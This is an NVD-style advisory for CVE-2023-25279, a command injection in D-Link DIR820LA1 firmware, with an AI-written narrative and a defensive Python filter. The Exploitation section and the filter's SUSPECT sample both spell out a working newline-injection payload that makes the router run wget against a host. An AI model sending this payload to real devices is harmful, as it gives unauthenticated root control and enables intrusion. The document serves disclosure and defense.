Unrated severity · NVD Advisory · Published Mar 13, 2023 · Updated Mar 3, 2025

CVE-2023-25279

Description

A command injection vulnerability in D-Link DIR820LA1_FW105B03 allows unauthenticated attackers to execute arbitrary commands as root via crafted input to /tools_email.asp.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The vulnerability exists in D-Link DIR820LA1 firmware version DIR820LA1_FW105B03. It is an OS command injection in the /sbin/ncc2 binary, specifically in the function sub_5129BC. The function reads the parameters emailCfg_AccountName_1.1.0.0, emailCfg_SMTPServerAddress_1.1.0.0, emailCfg_EmailTo_1.1.0.0, and emailCfg_EmailFrom_1.1.0.0 submitted from the /tools_email.asp page and passes them, without adequate sanitisation, into a system call. A filter named hasInjectionString attempts to block command injection, but it does not reject newline characters (%0a), dollar signs ($), and other shell-significant symbols, so the filter can be bypassed [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP POST request to /get_set.ccp with one of the vulnerable parameters containing a newline (%0a) followed by an arbitrary command. For example, the payload emailCfg_AccountName_1.1.0.0=%0awget http://192.168.0.2%0a injects a wget command. No authentication is required; the attacker only needs network access to the device's web interface [1].

Impact

Successful exploitation allows an attacker to execute arbitrary operating system commands as the root user, leading to full compromise of the device. This can result in unauthorized remote control, data exfiltration, or further attacks on the network [1].

Mitigation

As of the publication date (2023-03-13), no official patch has been released by D-Link. The affected firmware version DIR820LA1_FW105B03 may be end-of-life (EOL); users should consider upgrading to a supported device or applying network-level filtering to block requests to /tools_email.asp and /get_set.ccp [1][2].
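The following is an added example, not code from the advisory or from D-Link: a front-end proxy check that applies the interim mitigation above (reject the two endpoints outright) and, for the four parameter names the advisory identifies, flags values that contain the newline and dollar-sign characters the firmware's blocklist misses, falling back to a strict allowlist rather than a blocklist. The allowlist formats, the blocked-path list, and the sample request bodies are assumptions constructed for the example.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs

# Parameters the advisory names as reaching a system call in /sbin/ncc2.
VULN_PARAMS = {
    "emailCfg_AccountName_1.1.0.0",
    "emailCfg_SMTPServerAddress_1.1.0.0",
    "emailCfg_EmailTo_1.1.0.0",
    "emailCfg_EmailFrom_1.1.0.0",
}
# Per-parameter allowlists (assumed formats, not taken from the firmware).
_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")
ALLOW = {
    "emailCfg_AccountName_1.1.0.0": re.compile(r"^[A-Za-z0-9._@+-]{1,64}$"),
    "emailCfg_SMTPServerAddress_1.1.0.0": re.compile(r"^[A-Za-z0-9.-]{1,253}$"),
    "emailCfg_EmailTo_1.1.0.0": _EMAIL,
    "emailCfg_EmailFrom_1.1.0.0": _EMAIL,
}
# Characters a shell interprets; the advisory notes the firmware's own
# blocklist lets \n and $ through, so they are checked here explicitly.
SHELL_META = re.compile(r"[\n\r$`;|&<>(){}]")
# Endpoints the advisory suggests filtering until a fix exists (assumed path set).
BLOCKED_PATHS = {"/tools_email.asp", "/get_set.ccp"}

def inspect_post_body(body: str) -> list:
    """Return (param, reason) findings for a URL-encoded POST body.
    parse_qs percent-decodes, so %0a becomes a real newline, i.e. the
    check sees the same bytes the firmware would hand to the shell."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in VULN_PARAMS:
            continue
        for value in values:
            if SHELL_META.search(value):
                findings.append((name, "shell metacharacter or newline"))
            elif not ALLOW[name].fullmatch(value):
                findings.append((name, "outside allowlist"))
    return findings

def filter_decision(path: str, body: str) -> str:
    """Proxy decision: drop the unpatched endpoints outright; elsewhere,
    drop only requests whose email-config parameters fail inspection."""
    if path in BLOCKED_PATHS:
        return "block: unpatched endpoint"
    if inspect_post_body(body):
        return "block: injection pattern"
    return "allow"

# Constructed sample bodies (not captured traffic): a benign save, and the
# newline-injection shape the advisory describes for the account-name field.
BENIGN = ("emailCfg_AccountName_1.1.0.0=alerts"
          "&emailCfg_SMTPServerAddress_1.1.0.0=smtp.example.com"
          "&emailCfg_EmailTo_1.1.0.0=admin%40example.com"
          "&emailCfg_EmailFrom_1.1.0.0=router%40example.com")
SUSPECT = "emailCfg_AccountName_1.1.0.0=%0awget%20http%3A%2F%2F192.168.0.2%0a"
```

Because the check runs on the percent-decoded value, it also catches the raw newline or dollar sign when the client sends them unencoded.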

AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
